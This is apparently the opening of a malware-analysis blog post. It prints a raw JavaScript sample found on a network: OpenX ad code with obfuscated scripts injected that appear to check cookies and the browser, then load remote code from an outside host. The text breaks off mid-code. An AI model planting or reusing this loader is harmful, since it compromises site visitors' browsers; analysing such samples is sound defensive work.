A couple of weeks ago, a friend dropped me a sample of some malware that he encountered in his network (thanks
@0daySimpson). It's written in javascript, and although most of it is pretty intelligible, there's a lovely section of obfuscated code that hides its intent very effectively. The challenge? Figure out what it does, of course! He asked for my assistance with analyzing the script, so that's just what I did. Here's how it went.
Step 1: Prettify the Code
When I first got my hands on the sample, it looked like this (WARNING: long block of code ahead!):
if(typeof org=="undefined"){var org=new Object();}if(typeof org.openx=="undefined"){org.openx=new Object();}if(typeof org.openx.util=="undefined"){org.openx.util=new Object();}if(typeof org.openx.SWFObjectUtil=="undefined"){org.openx.SWFObjectUtil=new Object();}org.openx.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=org.openx.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1){this.setAttribute("swf",_1);}if(id){this.setAttribute("id",id);}if(w){this.setAttribute("width",w);}if(h){this.setAttribute("height",h);}if(_5){this.setAttribute("version",new org.openx.PlayerVersion(_5.toString().split(".")));}this.installedVer=org.openx.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){org.openx.SWFObject.doPrepUnload=true;}if(c){this.addParam("bgcolor",c);}var q=_7?_7:"high";this.addParam("quality",q);this.setAttribute("useExpressInstall",false);this.setAttribute("doExpressInstall",false);var _c=(_8)?_8:window.location;this.setAttribute("xiRedirectUrl",_c);this.setAttribute("redirectUrl","");if(_9){this.setAttribute("redirectUrl",_9);}};org.openx.SWFObject.prototype={useExpressInstall:function(_d){this.xiSWFPath=!_d?"expressinstall.swf":_d;this.setAttribute("useExpressInstall",true);},setAttribute:function(_e,_f){this.attributes[_e]=_f;},getAttribute:function(_10){return this.attributes[_10];},addParam:function(_11,_12){this.params[_11]=_12;},getParams:function(){return this.params;},addVariable:function(_13,_14){this.variables[_13]=_14;},getVariable:function(_15){return this.variables[_15];},getVariables:function(){return this.variables;},getVariablePairs:function(){var _16=new Array();var key;var _18=this.getVariables();for(key in _18){_16[_16.length]=key+"="+_18[key];}return _16;},getSWFHTML:function(){var _19="";if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");this.setAttribute("swf",this.xiSWFPath);}_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\"";_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";var _1a=this.getParams();for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}var _1c=this.getVariablePairs().join("&");if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");this.setAttribute("swf",this.xiSWFPath);}_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\">";_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";var _1d=this.getParams();for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}var _1f=this.getVariablePairs().join("&");if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}return _19;},write:function(_20){if(this.getAttribute("useExpressInstall")){var _21=new org.openx.PlayerVersion([6,0,65]);if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){this.setAttribute("doExpressInstall",true);this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));document.title=document.title.slice(0,47)+" - Flash Player Installation";this.addVariable("MMdoctitle",document.title);}}if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){var n=(typeof _20=="string")?document.getElementById(_20):_20;n.innerHTML=this.getSWFHTML();return true;}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};org.openx.SWFObjectUtil.getPlayerVersion=function(){var _23=new org.openx.PlayerVersion([0,0,0]);if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){_23=new org.openx.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}}else{if(navigator.userAgent&&navigator.userAgent.indexOf("Windows CE")>=0){var axo=1;var _26=3;while(axo){try{_26++;axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+_26);_23=new org.openx.PlayerVersion([_26,0,0]);}catch(e){axo=null;}}}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");_23=new org.openx.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}catch(e){}}if(axo!=null){_23=new org.openx.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}}return _23;};org.openx.PlayerVersion=function(_29){this.major=_29[0]!=null?parseInt(_29[0]):0;this.minor=_29[1]!=null?parseInt(_29[1]):0;this.rev=_29[2]!=null?parseInt(_29[2]):0;};org.openx.PlayerVersion.prototype.versionIsValid=function(fv){if(this.major<fv.major){return false;}if(this.major>fv.major){return true;}if(this.minor<fv.minor){return false;}if(this.minor>fv.minor){return true;}if(this.rev<fv.rev){return false;}return true;};org.openx.util={getRequestParameter:function(_2b){var q=document.location.search||document.location.hash;if(_2b==null){return q;}if(q){var _2d=q.substring(1).split("&");for(var i=0;i<_2d.length;i++){if(_2d[i].substring(0,_2d[i].indexOf("="))==_2b){return _2d[i].substring((_2d[i].indexOf("=")+1));}}}return "";}};org.openx.SWFObjectUtil.cleanupSWFs=function(){var _2f=document.getElementsByTagName("OBJECT");for(var i=_2f.length-1;i>=0;i--){_2f[i].style.display="none";for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=function(){};}}}};if(org.openx.SWFObject.doPrepUnload){if(!org.openx.unloadSet){org.openx.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",org.openx.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",org.openx.SWFObjectUtil.prepUnload);org.openx.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=org.openx.util.getRequestParameter;var FlashObject=org.openx.SWFObject;var SWFObject=org.openx.SWFObject;document.mmm_fo=1;var OX_0f4f918e = '';
OX_0f4f918e += "<"+"script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<"+"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><"+"/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<"+"/script><"+"!--ffnqt-->\n";
OX_0f4f918e += "<"+"div id=\'ox_64ea63b5f76eb3c481ad44a961e2c479\' style=\'display: inline;\'><"+"script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<"+"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><"+"/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<"+"/script><"+"!--ffnqt--><"+"a href=\'http://ad.same-story.com/delivery/ck.php?oaparams=2__bannerid=155__zoneid=9__cb=956c2f8948__oadest=http%3A%2F%2Fhome.edt02.net%2Femc%2Fbanner%2Fmstbc.php%3Fc%3D40060-195305-99922-0-335287\' target=\'_blank\'><"+"img src=\'http://ad.same-story.com/images/9b4c7c85bcd76a4593020663b97f5dec.gif\' width=\'300\' height=\'250\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+